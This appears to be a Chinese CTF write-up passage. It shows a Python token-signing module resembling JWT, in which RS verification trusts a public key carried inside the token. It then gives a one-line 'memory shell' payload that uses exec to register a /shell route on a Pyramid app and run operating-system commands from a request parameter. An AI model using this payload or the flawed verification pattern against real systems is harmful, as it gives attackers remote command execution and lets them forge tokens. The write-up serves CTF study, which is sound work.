15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
|
import base64
import json
import uuid
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
import hashlib
secret = str(uuid.uuid4())
def generate_keys():
key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()
return private_key, public_key
def sign_data(private_key, data):
rsakey = RSA.import_key(private_key)
# 将JSON数据转换为字符串
data_str = json.dumps(data)
hash_obj = SHA256.new(data_str.encode('utf-8'))
signature = pkcs1_15.new(rsakey).sign(hash_obj)
return signature
def verify_signature(secret, data, signature, alg):
if alg == 'RS':
rsakey = RSA.import_key(secret)
# 将JSON数据转换为字符串
data_str = json.dumps(data)
hash_obj = SHA256.new(data_str.encode('utf-8'))
try:
pkcs1_15.new(rsakey).verify(hash_obj, signature)
print("Signature is valid. Transmitted data:", data)
return True
except (ValueError, TypeError):
print("Signature is invalid.")
return False
elif alg == 'HS':
hash_object = hashlib.sha256()
data_bytes = (json.dumps(data) + secret.decode()).encode('utf-8')
print(data_bytes)
hash_object.update(data_bytes)
hex_dig = hash_object.hexdigest()
if hex_dig == signature.decode():
return True
else:
return False
def data_encode(data, alg):
if alg not in ['HS', 'RS']:
raise "Algorithm must be HS or RS!"
else:
private_key, public_key = generate_keys()
if alg == 'RS':
signature = sign_data(private_key, data)
data_bytes = json.dumps(data).encode('utf-8')
encoded_data1 = base64.b64encode(data_bytes) # data
encoded_data2 = base64.b64encode(signature) # signature
print(encoded_data2)
encoded_data3 = base64.b64encode(alg.encode('utf-8')) # alg
encoded_data4 = base64.b64encode(public_key) # public_key
encoded_data = encoded_data1.decode() + '.' + encoded_data2.decode() + '.' + encoded_data3.decode() + '.' + encoded_data4.decode()
print("The encoded data is: ", encoded_data)
return encoded_data
else:
hash_object = hashlib.sha256()
data_bytes = (json.dumps(data) + secret).encode('utf-8')
inputdata = json.dumps(data).encode('utf-8')
hash_object.update(data_bytes)
hex_dig = hash_object.hexdigest()
signature = base64.b64encode(hex_dig.encode('utf-8'))
encoded_data1 = base64.b64encode(inputdata) # data
encoded_data3 = base64.b64encode(alg.encode('utf-8')) # alg
encoded_data = encoded_data1.decode() + '.' + signature.decode() + '.' + encoded_data3.decode()
print("The encoded data is: ", encoded_data)
return encoded_data
def data_decode(encode_data):
try:
all_data = encode_data.split('.')
sig_bytes = all_data[1].replace(' ', '+').encode('utf-8')
print(sig_bytes)
data = base64.b64decode(all_data[0].replace(' ', '+')).decode('utf-8')
json_data = json.loads(data)
signature = base64.b64decode(sig_bytes)
alg = base64.b64decode(all_data[2]).decode('utf-8')
key = secret
if len(all_data) == 4:
key_bytes = all_data[3].replace(' ', '+').encode('utf-8')
key = base64.b64decode(key_bytes) # bytes
# 验证签名
is_valid = verify_signature(key, json_data, signature, alg)
if is_valid:
return json_data
else:
return False
except:
raise "something error"
def read_html(filname):
with open('./static/' + filname, 'r', encoding='utf-8') as file:
# 读取文件内容
html_content = file.read()
return html_content
|
上面一题由于config是局部变量获取不了,这题可以了
直接上内存马payload
1
|
exec("import sys;config = sys.modules['__main__'].config;app=sys.modules['__main__'].app;print(config);config.add_route('shell', '/shell');config.add_view(lambda request: Response(__import__('os').popen(request.params.get('1')).read()),route_name='shell');app = config.make_wsgi_app()")
|